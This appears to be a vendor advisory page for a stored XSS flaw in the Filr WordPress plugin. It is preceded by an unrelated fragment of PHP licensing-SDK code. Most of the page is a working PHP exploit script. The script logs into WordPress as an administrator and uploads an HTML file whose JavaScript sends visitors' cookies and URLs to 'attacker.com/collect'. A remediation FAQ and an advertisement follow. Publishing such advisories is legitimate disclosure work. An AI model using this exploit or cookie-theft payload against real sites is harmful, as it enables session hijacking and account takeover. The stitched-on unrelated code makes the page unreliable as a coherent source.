+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function can_use_premium_code__premium_only() {
+			return $this->is_premium() && $this->can_use_premium_code();
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Trial
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user in a trial.
+		 *
+		 * @since 1.0.3
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial();
+
+		/**
+		 * Check if trial already utilized.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_utilized();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Plans
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user is on the free plan of the product.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_free_plan();
+
+		/**
+		 * @since  1.0.2
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan based on trial. If not in trial mode, should return false.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial( $plan, $exact = false ) {
+			return $this->is_plan( $plan, $exact ) ||
+			       $this->is_trial_plan( $plan, $exact );
+		}
+
+		/**
+		 * Check if plugin has any paid plans.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_paid_plan();
+
+		/**
+		 * Check if plugin has any free plan, or is it premium only.
+		 *
+		 * Note: If no plans configured, assume plugin is free.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_free_plan();
+
+		/**
+		 * Check if plugin is premium only (no free plans).
+		 *
+		 * NOTE: is__premium_only() is very different method, don't get confused.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_only_premium();
+
+		/**
+		 * Check if module has a premium code version.
+		 *
+		 * Serviceware module might be freemium without any
+		 * premium code version, where the paid features
+		 * are all part of the service.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.6
+		 *
+		 * @return bool
+		 */
+		abstract function has_premium_version();
+
+		/**
+		 * Check if module has any release on Freemius,
+		 * or all plugin's code is on WordPress.org (Serviceware).
+		 *
+		 * @return bool
+		 */
+		function has_release_on_freemius() {
+			return ! $this->is_org_repo_compliant() ||
+			       $this->has_premium_version();
+		}
+
+		/**
+		 * Checks if it's a freemium plugin.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function is_freemium() {
+			return $this->has_paid_plan() &&
+			       $this->has_free_plan();
+		}
+
+		/**
+		 * Check if module has only one plan.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_single_plan();
+
+		#endregion
+
+		/**
+		 * Check if running payments in sandbox mode.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_payments_sandbox();
+
+		/**
+		 * Check if running test vs. live plugin.
+		 *
+		 * @since 1.0.5
+		 *
+		 * @return bool
+		 */
+		abstract function is_live();
+
+

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14632 - Filr – Secure document library <= 1.2.11 - Authenticated (Administrator+) Stored Cross-Site Scripting via HTML Upload

<?php
/**
 * Proof of Concept for CVE-2025-14632
 * Requires valid administrator credentials for the target WordPress site
 * Uploads an HTML file containing JavaScript payload via vulnerable Filr plugin
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'admin';
$password = 'password';

// Create malicious HTML file with JavaScript payload
$malicious_html = <<<HTML
<!DOCTYPE html>
<html>
<head>
    <title>Malicious Document</title>
</head>
<body>
    <h1>Document Preview</h1>
    <script>
        // XSS payload - exfiltrate admin cookies
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://attacker.com/collect', true);
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.send('cookies=' + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(window.location.href));
        
        // Additional malicious actions can be added here
        alert('XSS executed via CVE-2025-14632');
    </script>
</body>
</html>
HTML;

// Save HTML to temporary file
$temp_file = tempnam(sys_get_temp_dir(), 'filr_xss_');
file_put_contents($temp_file, $malicious_html);

// Initialize cURL session for authentication
$ch = curl_init();

// First, authenticate to get WordPress cookies
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => sys_get_temp_dir() . '/wordpress_cookies.txt',
    CURLOPT_COOKIEFILE => sys_get_temp_dir() . '/wordpress_cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => str_replace('/wp-admin/admin-ajax.php', '/wp-admin/', $target_url),
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Atomic-Edge-PoC/1.0'
    ]
]);

$response = curl_exec($ch);

// Check if authentication succeeded
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    echo "Authentication failed. Check credentials.n";
    unlink($temp_file);
    exit(1);
}

echo "Authentication successful. Proceeding with file upload...n";

// Prepare multipart form data for file upload
$post_fields = [
    'action' => 'filr_upload_file',
    'file' => new CURLFile($temp_file, 'text/html', 'malicious_document.html')
];

// Configure cURL for the vulnerable AJAX endpoint
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_HTTPHEADER => [
        'User-Agent: Atomic-Edge-PoC/1.0',
        'X-Requested-With: XMLHttpRequest'
    ]
]);

$upload_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Clean up temporary file
unlink($temp_file);
curl_close($ch);

// Parse response
if ($http_code === 200) {
    $response_data = json_decode($upload_response, true);
    
    if (isset($response_data['success']) && $response_data['success'] === true) {
        echo "SUCCESS: Malicious HTML file uploaded successfully!n";
        echo "File URL: " . $response_data['data']['url'] . "n";
        echo "Access this URL to trigger the XSS payload.n";
    } else {
        echo "ERROR: Upload failed. Response: " . $upload_response . "n";
        echo "The site may already be patched (version 1.2.12+).n";
    }
} else {
    echo "ERROR: HTTP $http_code received. Upload may have failed.n";
    echo "Response: " . $upload_response . "n";
}

// Clean up cookie file
if (file_exists(sys_get_temp_dir() . '/wordpress_cookies.txt')) {
    unlink(sys_get_temp_dir() . '/wordpress_cookies.txt');
}

?>

Frequently Asked Questions

What is CVE-2025-14632?
Overview of the vulnerability
CVE-2025-14632 is a stored cross-site scripting (XSS) vulnerability in the Filr – Secure document library plugin for WordPress. It allows authenticated users with Administrator-level access to upload malicious HTML files that can execute JavaScript when accessed by other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient file type validation in the FILR_Uploader class, allowing the upload of HTML files. When these files are accessed, the embedded JavaScript executes in the user’s browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying impacted users
All users of the Filr plugin version 1.2.11 and earlier are affected, particularly those with Administrator privileges. If you have the ability to upload files through the plugin, you may be at risk.
How can I check if my site is vulnerable?
Assessment steps
To determine if your site is vulnerable, check the version of the Filr plugin installed. If it is version 1.2.11 or earlier, it is susceptible to CVE-2025-14632. Additionally, review your site’s file upload functionality for any unauthorized HTML files.
How can I fix the vulnerability?
Recommended actions
The vulnerability can be fixed by updating the Filr plugin to version 1.2.12 or later, which includes proper file type validation. Ensure that all instances of the plugin are updated across your WordPress installations.
What does the CVSS score of 4.4 indicate?
Understanding severity levels
A CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It is essential to address it to prevent potential attacks.
What are the practical risks of this vulnerability?
Potential consequences
Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user who views the uploaded file. This can lead to session hijacking, account takeover, and unauthorized actions performed on behalf of users.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an authenticated attacker can upload a malicious HTML file containing JavaScript. It shows the steps required to exploit the vulnerability and highlights the potential for data exfiltration through crafted scripts.
What security measures should I implement?
Best practices for mitigation
In addition to updating the plugin, implement security measures such as limiting file upload capabilities, using security plugins to monitor file changes, and regularly reviewing user permissions to minimize risks.
What should I do if I suspect exploitation?
Response steps
If you suspect that your site has been exploited, immediately remove any unauthorized files, change passwords for affected accounts, and conduct a thorough security audit. Consider restoring from a clean backup if necessary.
Can this vulnerability affect other plugins or themes?
Broader implications
While CVE-2025-14632 specifically affects the Filr plugin, similar vulnerabilities can exist in other plugins or themes that allow file uploads without proper validation. Regularly review and update all components of your WordPress site.
Where can I find more information about this vulnerability?
Additional resources
More information can be found in the official CVE database, security blogs, and the WordPress plugin repository. It is advisable to stay informed about security updates and best practices for WordPress.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations